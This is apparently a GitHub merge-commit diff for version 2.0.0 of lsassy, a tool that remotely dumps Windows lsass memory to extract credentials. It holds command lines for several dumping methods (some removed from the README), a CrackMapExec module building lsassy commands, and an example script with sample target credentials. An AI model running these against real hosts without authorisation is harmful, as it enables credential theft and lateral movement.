Merge pull request #28 from Hackndo/2.0.0

2.0.0

.gitignore

@@ -28,5 +28,4 @@ MANIFEST
 .idea
 
 # Tests
-
-test/tests.config.sh
+tests/tests_config.py

Makefile

@@ -21,3 +21,6 @@ build: clean
 	python3.7 setup.py install
 
 install: build
+
+test:
+	python3.7 setup.py test

README.md

@@ -1,30 +1,27 @@
 # lsassy
 
-[![PyPI version](https://d25lcipzij17d.cloudfront.net/badge.svg?id=py&type=6&v=1.1.7&x2=0)](https://pypi.org/project/lsassy/) [![Twitter](https://img.shields.io/twitter/follow/hackanddo?label=HackAndDo&style=social)](https://twitter.com/intent/follow?screen_name=hackanddo)
+[![PyPI version](https://d25lcipzij17d.cloudfront.net/badge.svg?id=py&type=6&v=2.0.0&x2=0)](https://pypi.org/project/lsassy/) [![Twitter](https://img.shields.io/twitter/follow/hackanddo?label=HackAndDo&style=social)](https://twitter.com/intent/follow?screen_name=hackanddo)
 
 ![CME Module example](https://github.com/Hackndo/lsassy/raw/master/assets/example.png)
 
-Python library to remotely extract credentials. This [blog post](https://en.hackndo.com/remote-lsass-dump-passwords/) explains how it works.
-
-You can check the [wiki](https://github.com/Hackndo/lsassy/wiki)
+Python library to remotely extract credentials on a set of hosts. This [blog post](https://en.hackndo.com/remote-lsass-dump-passwords/) explains how it works.
 
 This library uses [impacket](https://github.com/SecureAuthCorp/impacket) project to remotely read necessary bytes in lsass dump and [pypykatz](https://github.com/skelsec/pypykatz) to extract credentials.
 
 | Chapters                                     | Description                                             |
 |----------------------------------------------|---------------------------------------------------------|
 | [Requirements](#requirements)                | Requirements to install lsassy from source              |
 | [Installation](#installation)                | Installation commands from pip or from source           |
-| [Basic Usage](#basic-usage)                  | Command line template for standalone version            |
-| [Advanced Usage](#advanced)                  | Advanced usage (Dumping methods, execution methods, ...)|
+| [Documentation](#documentation)              | Lsassy documentation                                    |
 | [CrackMapExec Module](#crackmapexec-module)  | Link to CrackMapExec module included in this repository |
-| [Examples](#examples-1)                      | Command line examples for standalone and CME module     |
 | [Issues](#issues)                            | Read this before creating an issue                      |
 | [Acknowledgments](#acknowledgments)          | Kudos to these people and tools                         |
 | [Contributors](#contributors)                | People contributing to this tool                        |
 
 ## Requirements
 
 * Python >= 3.6
+* netaddr
 * [pypykatz](https://github.com/skelsec/pypykatz) >= 0.3.0
 * [impacket](https://github.com/SecureAuthCorp/impacket)
 
@@ -42,101 +39,30 @@ python3.7 -m pip install lsassy
 python3.7 setup.py install
 ```
 
-## Basic Usage
-
-```
-lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target>
-```
-
-## Advanced
-
-### Dumping methods
-
-This tool can dump lsass in different ways.
-
-Dumping methods (`-m` or `--method`)
-* **0**: Try all methods (dll then procdump) to dump lsass, stop on success (Requires -p if dll method fails, -u if procdump method fails)
-* **1**: comsvcs.dll method, stop on success (default)
-* **2**: Procdump method, stop on success (Requires -p)
-* **3**: comsvcs.dll + Powershell method, stop on success
-* **4**: comsvcs.dll + cmd.exe method
-* **5**: (unsafe) Dumpert method, stop on success (Requires -u)
-
-#### comsvcs.dll method
-
-This method **only uses built-in Windows files** to extract remote credentials. It uses **minidump** function from **comsvcs.dll** to dump **lsass** process.
-
-This method can only be used when context has **SeDebugPrivilege**. This privilege is either in Powershell local admin context, or cmd.exe SYSTEM context.
-
-Two execution methods can be used.
-1. **WMIExec** with cmd.exe (no SeDebugPrivilege), or powershell (SeDebugPrivilege)
-2. **ScheduledTasks** with SYSTEM context (SeDebugPrivilege)
-
-#### Procdump method
-
-This method uploads **procdump.exe** from SysInternals to dump **lsass** process. It will first try to execute
-procdump using WMI, and if it fails it will create a remote task, execute it and delete it.
-
-#### Dumpert method
-
-This method uploads **dumpert.exe** to dump **lsass** process. It will first try to execute
-dumpert using WMI, and if it fails it will create a remote task, execute it and delete it.
-
-#### Examples
-
-```bash
-lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 0 -p /path/to/procdump.exe -u /path/to/dumpert.exe
-lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 1
-lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 2 -p /path/to/procdump.exe
-lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 3
-lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 4
-lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 5 -u /path/to/dumpert.exe
-```
-
-### Remote parsing only
-
-lsassy can parse an already dumped lsass process.
+## Documentation
 
-```
-lsassy [--hashes [LM:]NT] --dumppath /share/path/to/dump.dmp [<domain>/]<user>[:<password>]@<target>
-```
+The tool is fully documented in the [wiki](https://github.com/Hackndo/lsassy/wiki) of this project
 
 ## CrackMapExec module
 
 I wrote a CrackMapExec module that uses **lsassy** to extract credentials on compromised hosts
 
 CrackMapExec module is in `cme` folder : [CME Module](https://github.com/Hackndo/lsassy/tree/master/cme)
 
-## Examples
-
-### lsassy
-
-```bash
-# RunDLL Method
-lsassy adsec.local/jsnow:[email protected]
-
-# Procdump Method
-lsassy -m 2 -p /tmp/procdump.exe adsec.local/jsnow:[email protected]
-
-# Dumpert Method
-lsassy -m 5 -u /tmp/dumpert.exe adsec.local/jsnow:[email protected]
-
-# Remote parsing only
-lsassy --dumppath C$/Windows/Temp/lsass.dmp adsec.local/jsnow:[email protected]
-
-# NT Hash Authentication
-lsassy --hashes 952c28bd2fd728898411b301475009b7 [email protected]
-```
-
-### CME Module
-
-```
-crackmapexec smb 10.0.0.0/24 -d adsec.local -u Administrator -p Passw0rd -M lsassy -o BLOODHOUND=True NEO4JPASS=bloodhound 
-```
 
 ### ChangeLog
 
 ```
+v2.0.0
+------
+* Multiprocessing support to dump credentials on multiple hosts at a time
+* Add new dumping method using "dumpert"
+* Can be used as a library in other python projects
+* Syntax changed to be more flexible
+* Complete code refactoring, way more organized and easy to maintain/extend
+* Better error handling
+* Complete wiki
+
 v1.1.0
 ------
 * Better execution process : --method flag has been added and described in help text

cme/lsassy.py

@@ -85,23 +85,17 @@ def on_admin_login(self, context, connection):
         nthash = getattr(connection, "nthash", "")
         host = connection.host
 
-        py_arg = "{}/{}:{}@{}".format(
-            domain_name, username, password, host
-        )
-
-        command = r"lsassy -j --hashes {}:{} '{}'".format(
-            lmhash,
-            nthash,
-            py_arg
+        command = r"lsassy --format json -d '{}' -u '{}' -p '{}' -H '{}:{}' {}".format(
+            domain_name, username, password, lmhash, nthash, host
         )
 
         if context.verbose:
-            command += " -d "
+            command += " -vv "
         else:
-            command += " -q "
+            command += " --quiet "
 
         if self.method:
-            command += " -m {}".format(self.method)
+            command += " --method {}".format(self.method)
 
         if self.remote_lsass_dump:
             command += " --dumpname {}".format(self.remote_lsass_dump)
@@ -124,8 +118,11 @@ def on_admin_login(self, context, connection):
 
         if code != 0:
             # Debug output
-            context.log.error('Error while executing lsassy, try using CrackMapExec with --verbose to get more details')
-            context.log.debug('----- lsassy error -----')
+            if code == 5:
+                context.log.error('Lsass is protected')
+            else:
+                context.log.error('Error while executing lsassy, try using CrackMapExec with --verbose to get more details')
+            context.log.debug('----- lsassy error [{}] -----'.format(code))
             for line in err.split("\n"):
                 context.log.debug('{}'.format(line))
             context.log.debug('-----   end error  -----')

examples/get_credentials.py

@@ -0,0 +1,23 @@
+# Author:
+#  Romain Bentz (pixis - @hackanddo)
+# Website:
+#  https://beta.hackndo.com
+
+from lsassy import Lsassy, Logger, Dumper, Parser, Writer
+
+log_options = Logger.Options(verbosity=2, quiet=False)
+dump_options = Dumper.Options(method=2, dumpname="lsass.dmp", procdump="/opt/Sysinternals/procdump.exe")
+parse_options = Parser.Options(raw=True)
+write_option = Writer.Options(format="pretty", output_file="/tmp/credentials.txt")
+
+lsassy = Lsassy(
+    hostname="192.168.1.122",
+    username="pixis",
+    domain="adsec.local",
+    password="h4cknd0",
+    log_options=log_options,
+    dump_options=dump_options,
+    parse_options=parse_options,
+    write_options=write_option
+)
+print(lsassy.get_credentials())

lsassy/__init__.py

@@ -4,4 +4,13 @@
 #  https://beta.hackndo.com [FR]
 #  https://en.hackndo.com [EN]
 
-name = "lsassy"
+from .core import Lsassy
+from .modules.dumper import Dumper
+from .modules.logger import Logger
+from .modules.parser import Parser
+from .modules.writer import Writer
+
+__all__ = ["Lsassy", "Dumper", "Logger", "Parser", "Writer"]
+
+name = "lsassy"
+